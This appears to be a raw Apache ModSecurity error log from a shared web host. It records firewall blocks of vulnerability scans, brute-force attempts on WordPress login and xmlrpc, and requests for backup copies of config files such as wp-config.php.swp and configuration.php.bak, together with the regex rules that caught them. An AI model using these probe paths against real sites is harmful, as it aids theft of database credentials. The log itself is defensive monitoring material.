[Tue May 26 14:41:58.844760 2026] [security2:error] [pid 636820:tid 637057] [client 43.156.66.8:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVj3a_r6oOphPch7B99aAAAAGs"]
[Tue May 26 14:41:58.853271 2026] [security2:error] [pid 636820:tid 636956] [client 43.156.66.8:34364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahVj3a_r6oOphPch7B99ZgAAAAY"]
[Tue May 26 14:41:59.236133 2026] [core:crit] [pid 636820:tid 637067] (13)Permission denied: [client 40.77.167.17:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:59.346661 2026] [security2:error] [pid 636820:tid 636982] [client 202.141.83.254:53977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj36_r6oOphPch7B99sgAAACA"]
[Tue May 26 14:41:59.346780 2026] [security2:error] [pid 636820:tid 636982] [client 202.141.83.254:53977] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj36_r6oOphPch7B99sgAAACA"]
[Tue May 26 14:41:59.363077 2026] [security2:error] [pid 636820:tid 636964] [client 108.136.162.67:56653] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujtradingco.com"] [uri "/wp-config.php.swp"] [unique_id "ahVj36_r6oOphPch7B99swAAAA4"]
[Tue May 26 14:42:00.240659 2026] [security2:error] [pid 636820:tid 637004] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj4K_r6oOphPch7B99xQAAADY"]
[Tue May 26 14:42:00.266797 2026] [security2:error] [pid 636820:tid 637030] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj36_r6oOphPch7B99vAAAAFA"]
[Tue May 26 14:42:00.676323 2026] [security2:error] [pid 636820:tid 637040] [client 108.136.162.67:56820] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "anujtradingco.com"] [uri "/wp-config.php~"] [unique_id "ahVj4K_r6oOphPch7B991QAAAFo"]
[Tue May 26 14:42:01.477357 2026] [security2:error] [pid 636820:tid 636992] [client 108.136.162.67:57112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/wp-config.old"] [unique_id "ahVj4a_r6oOphPch7B994wAAACo"]
[Tue May 26 14:42:01.744071 2026] [security2:error] [pid 636820:tid 637009] [client 108.136.162.67:57112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php.bak"] [unique_id "ahVj4a_r6oOphPch7B996AAAADs"]
[Tue May 26 14:42:02.475811 2026] [security2:error] [pid 636820:tid 636971] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj4a_r6oOphPch7B999wAAABU"]
[Tue May 26 14:42:02.555121 2026] [security2:error] [pid 636820:tid 637030] [client 108.136.162.67:57400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php-dist"] [unique_id "ahVj4q_r6oOphPch7B9-BgAAAFA"]
[Tue May 26 14:42:03.259932 2026] [security2:error] [pid 636820:tid 637064] [client 89.221.206.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj46_r6oOphPch7B9-EgAAAHI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:42:03.383134 2026] [security2:error] [pid 636820:tid 637013] [client 108.136.162.67:57567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/configuration.php.old"] [unique_id "ahVj46_r6oOphPch7B9-GQAAAD8"]
[Tue May 26 14:42:04.038849 2026] [security2:error] [pid 636820:tid 637048] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj46_r6oOphPch7B9-IgAAAGI"]
[Tue May 26 14:42:04.169261 2026] [security2:error] [pid 636820:tid 637044] [client 108.136.162.67:57720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config/database.php.bak"] [unique_id "ahVj5K_r6oOphPch7B9-LwAAAF4"]
[Tue May 26 14:42:04.611464 2026] [security2:error] [pid 636820:tid 636968] [client 89.221.206.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj5K_r6oOphPch7B9-QgAAABI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 14:42:05.021208 2026] [security2:error] [pid 636820:tid 636970] [client 108.136.162.67:57932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config/database.php.old"] [unique_id "ahVj5a_r6oOphPch7B9-SgAAABQ"]
[Tue May 26 14:42:05.494679 2026] [security2:error] [pid 636820:tid 636884] [remote 5.42.158.148:49868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVj5a_r6oOphPch7B9-TgAAOj8"]
[Tue May 26 14:42:05.818804 2026] [security2:error] [pid 636820:tid 637010] [client 108.136.162.67:58181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config/database.php.txt"] [unique_id "ahVj5a_r6oOphPch7B9-YAAAADw"]
[Tue May 26 14:42:05.935829 2026] [security2:error] [pid 636820:tid 636960] [client 72.207.113.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj5a_r6oOphPch7B9-YwAAAAo"], referer: http://www.anujtradingco.com/
[Tue May 26 14:42:06.100747 2026] [autoindex:error] [pid 636820:tid 637038] [client 194.163.174.253:52282] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:42:06.430950 2026] [security2:error] [pid 636820:tid 637067] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj5q_r6oOphPch7B9-aQAAAHU"]
[Tue May 26 14:42:07.500453 2026] [security2:error] [pid 636820:tid 637053] [client 72.207.113.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj56_r6oOphPch7B9-jAAAAGc"], referer: http://www.anujtradingco.com/features/header-with-parallax/
[Tue May 26 14:42:08.669844 2026] [security2:error] [pid 636820:tid 637046] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj6K_r6oOphPch7B9-mgAAAGA"]
[Tue May 26 14:42:09.996883 2026] [security2:error] [pid 636820:tid 636981] [client 202.141.83.254:19955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj6a_r6oOphPch7B9-ywAAAB8"]
[Tue May 26 14:42:09.997041 2026] [security2:error] [pid 636820:tid 636981] [client 202.141.83.254:19955] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj6a_r6oOphPch7B9-ywAAAB8"]
[Tue May 26 14:42:10.682549 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj6q_r6oOphPch7B9-4AAAADE"]
[Tue May 26 14:42:11.668261 2026] [security2:error] [pid 636820:tid 637067] [client 154.161.32.97:57053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVj66_r6oOphPch7B9_AAAAAHU"]
[Tue May 26 14:42:11.668424 2026] [security2:error] [pid 636820:tid 637067] [client 154.161.32.97:57053] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVj66_r6oOphPch7B9_AAAAAHU"]
[Tue May 26 14:42:12.785246 2026] [security2:error] [pid 636820:tid 636973] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj7K_r6oOphPch7B9_IwAAABc"]
[Tue May 26 14:42:13.840691 2026] [security2:error] [pid 636820:tid 637074] [client 85.208.96.206:13274] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVj7a_r6oOphPch7B9_VgAAAHw"]
[Tue May 26 14:42:13.840845 2026] [security2:error] [pid 636820:tid 637074] [client 85.208.96.206:13274] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVj7a_r6oOphPch7B9_VgAAAHw"]
[Tue May 26 14:42:14.576204 2026] [security2:error] [pid 636820:tid 637058] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj7q_r6oOphPch7B9_XAAAAGw"]
[Tue May 26 14:42:14.926711 2026] [security2:error] [pid 636820:tid 636955] [client 104.28.119.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVj7q_r6oOphPch7B9_aAAAAAU"]
[Tue May 26 14:42:15.128150 2026] [security2:error] [pid 636820:tid 636965] [client 107.172.50.134:59568] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "carpetagrafica.jhonweb.com"] [uri "/index.php"] [unique_id "ahVj7q_r6oOphPch7B9_aQAAAA8"]
[Tue May 26 14:42:16.260706 2026] [security2:error] [pid 636820:tid 637072] [client 107.172.50.134:59568] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "carpetagrafica.jhonweb.com"] [uri "/index.php"] [unique_id "ahVj76_r6oOphPch7B9_jAAAAHo"]
[Tue May 26 14:42:16.872060 2026] [security2:error] [pid 636820:tid 636963] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj8K_r6oOphPch7B9_pQAAAA0"]
[Tue May 26 14:42:18.966954 2026] [security2:error] [pid 636820:tid 636986] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj8q_r6oOphPch7B9_8wAAACQ"]
[Tue May 26 14:42:20.328042 2026] [security2:error] [pid 636820:tid 636959] [client 202.141.83.254:53973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj9K_r6oOphPch7B-ARgAAAAk"]
[Tue May 26 14:42:20.328181 2026] [security2:error] [pid 636820:tid 636959] [client 202.141.83.254:53973] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj9K_r6oOphPch7B-ARgAAAAk"]
[Tue May 26 14:42:20.587338 2026] [security2:error] [pid 636820:tid 637063] [client 62.60.130.227:58406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVj9K_r6oOphPch7B-ARwAAAHE"]
[Tue May 26 14:42:20.960945 2026] [security2:error] [pid 636820:tid 637077] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj9K_r6oOphPch7B-ATwAAAH8"]
[Tue May 26 14:42:20.977114 2026] [security2:error] [pid 636820:tid 636991] [client 62.60.130.227:54743] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9K_r6oOphPch7B-AWwAAACk"]
[Tue May 26 14:42:21.311744 2026] [security2:error] [pid 636820:tid 637028] [client 62.60.130.227:54823] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9a_r6oOphPch7B-AbgAAAE4"]
[Tue May 26 14:42:21.324211 2026] [security2:error] [pid 636820:tid 637015] [client 185.207.250.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj9a_r6oOphPch7B-AbQAAAEE"]
[Tue May 26 14:42:21.324750 2026] [security2:error] [pid 636820:tid 637020] [client 185.207.250.218:42120] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahVj9a_r6oOphPch7B-AZQAAAEY"]
[Tue May 26 14:42:21.639059 2026] [security2:error] [pid 636820:tid 637049] [client 62.60.130.227:63142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9a_r6oOphPch7B-AbwAAAGM"]
[Tue May 26 14:42:22.002594 2026] [security2:error] [pid 636820:tid 636967] [client 62.60.130.227:57426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9q_r6oOphPch7B-AiAAAABE"]
[Tue May 26 14:42:22.031060 2026] [security2:error] [pid 636820:tid 636982] [client 185.207.250.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVj9a_r6oOphPch7B-AhwAAACA"]
[Tue May 26 14:42:22.034168 2026] [security2:error] [pid 636820:tid 637066] [client 185.207.250.218:42136] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahVj9a_r6oOphPch7B-AhQAAAHQ"]
[Tue May 26 14:42:22.343238 2026] [security2:error] [pid 636820:tid 636966] [client 62.60.130.227:55358] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9q_r6oOphPch7B-AjgAAABA"]
[Tue May 26 14:42:22.510214 2026] [security2:error] [pid 636820:tid 636833] [remote 84.247.181.196:39736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVj9q_r6oOphPch7B-AjQAAcgw"]
[Tue May 26 14:42:22.692470 2026] [security2:error] [pid 636820:tid 636999] [client 62.60.130.227:49706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVj9q_r6oOphPch7B-AogAAADE"]
[Tue May 26 14:42:23.052481 2026] [security2:error] [pid 636820:tid 637039] [client 62.60.130.227:65255] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dgcni.org.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVj96_r6oOphPch7B-ArwAAAFk"]
[Tue May 26 14:42:23.098774 2026] [security2:error] [pid 636820:tid 636998] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj9q_r6oOphPch7B-AoQAAADA"]
[Tue May 26 14:42:24.487127 2026] [security2:error] [pid 636820:tid 636959] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj-K_r6oOphPch7B-AzQAAAAk"]
[Tue May 26 14:42:27.416817 2026] [security2:error] [pid 636820:tid 636968] [client 114.119.139.115:34081] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/category/html"] [unique_id "ahVj-6_r6oOphPch7B-BXQAAABI"], referer: https://glorodavionics.com/category/html
[Tue May 26 14:42:27.463697 2026] [security2:error] [pid 636820:tid 637052] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj-6_r6oOphPch7B-BSQAAAGY"]
[Tue May 26 14:42:28.816865 2026] [security2:error] [pid 636820:tid 637001] [client 192.228.39.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj_K_r6oOphPch7B-BiwAAADM"]
[Tue May 26 14:42:29.262232 2026] [security2:error] [pid 636820:tid 637013] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj_K_r6oOphPch7B-BoQAAAD8"]
[Tue May 26 14:42:30.786080 2026] [security2:error] [pid 636820:tid 637051] [client 202.141.83.254:53771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj_q_r6oOphPch7B-B0QAAAGU"]
[Tue May 26 14:42:30.786191 2026] [security2:error] [pid 636820:tid 637051] [client 202.141.83.254:53771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVj_q_r6oOphPch7B-B0QAAAGU"]
